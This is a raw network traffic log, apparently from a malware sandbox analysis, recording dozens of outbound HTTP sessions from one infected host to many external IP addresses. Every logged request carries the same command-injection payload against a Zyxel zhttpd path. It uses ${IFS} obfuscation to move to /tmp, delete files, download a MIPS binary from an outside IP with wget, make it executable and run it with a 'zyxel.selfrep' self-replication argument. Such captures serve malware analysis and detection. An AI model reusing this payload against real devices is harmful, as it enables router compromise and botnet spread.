                                      Jan 14, 2024 15:51:05.753243923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9289192.168.2.1455624133.228.170.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753292084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9290192.168.2.1437674207.65.65.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753319979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9291192.168.2.1452442146.237.207.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753348112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9292192.168.2.1450222208.102.186.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753408909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9293192.168.2.145589636.99.94.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753464937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9294192.168.2.143886249.42.31.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753520966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9295192.168.2.1459708207.99.107.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753550053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9296192.168.2.1446200120.54.20.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753599882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9297192.168.2.143518448.194.136.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753647089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9298192.168.2.143641435.49.106.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753669977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9299192.168.2.1445102165.72.113.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753706932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9300192.168.2.1444836207.7.238.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753745079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9301192.168.2.1433558189.168.249.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753791094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9302192.168.2.1445490209.153.200.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753870964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9303192.168.2.1435710119.66.153.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753914118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9304192.168.2.1440002199.193.209.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753914118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9305192.168.2.1434550113.86.100.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753947973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9306192.168.2.146029019.56.92.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.753984928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9307192.168.2.1433614156.18.106.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754018068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9308192.168.2.1453590104.171.14.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754062891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9309192.168.2.145825237.133.196.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754108906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9310192.168.2.144492093.26.204.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754159927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9311192.168.2.1441106181.108.59.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754187107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9312192.168.2.143760663.102.227.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754225969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9313192.168.2.143683047.119.179.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754287958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9314192.168.2.144958212.25.34.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754322052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9315192.168.2.1448240134.96.13.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754359007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9316192.168.2.1434394119.41.130.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754407883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9317192.168.2.1446150150.89.43.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754456997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9318192.168.2.1445982195.165.86.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754504919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9319192.168.2.1455818210.197.91.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754561901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9320192.168.2.1433254199.6.85.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754595995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9321192.168.2.1455600116.65.182.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754643917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9322192.168.2.1446070100.206.108.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754683971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9323192.168.2.1444096212.56.196.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754734039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9324192.168.2.1460382108.27.73.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754775047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9325192.168.2.143463069.164.81.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754822016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9326192.168.2.1455808212.106.15.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754889011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9327192.168.2.1433474194.9.148.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754950047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9328192.168.2.1458518134.4.169.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.754951000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9329192.168.2.144040892.232.61.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755023956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9330192.168.2.1448254192.118.190.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755055904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9331192.168.2.1440328106.96.154.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755120993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9332192.168.2.144361292.52.121.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755176067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9333192.168.2.145277269.147.7.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755209923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9334192.168.2.1460612190.171.187.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755253077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9335192.168.2.1460228212.33.11.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755281925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9336192.168.2.1455222201.102.131.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755320072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9337192.168.2.145916017.19.143.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755362988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9338192.168.2.1434586217.228.5.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755420923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9339192.168.2.144350414.137.82.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755465031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9340192.168.2.1437404142.41.205.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755515099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9341192.168.2.1449410161.26.11.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755559921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9342192.168.2.1448468209.37.93.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755605936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9343192.168.2.1440414148.87.28.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755636930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9344192.168.2.1454714123.224.73.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755666971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9345192.168.2.1454584106.13.222.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755724907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9346192.168.2.146081258.234.225.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755759954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9347192.168.2.144535484.182.194.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755798101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9348192.168.2.1456012125.151.49.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755837917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9349192.168.2.145546037.226.176.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755878925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9350192.168.2.144854093.63.118.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.755908012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9351192.168.2.1432820201.236.208.220443
                                      TimestampBytes transferredDirectionData
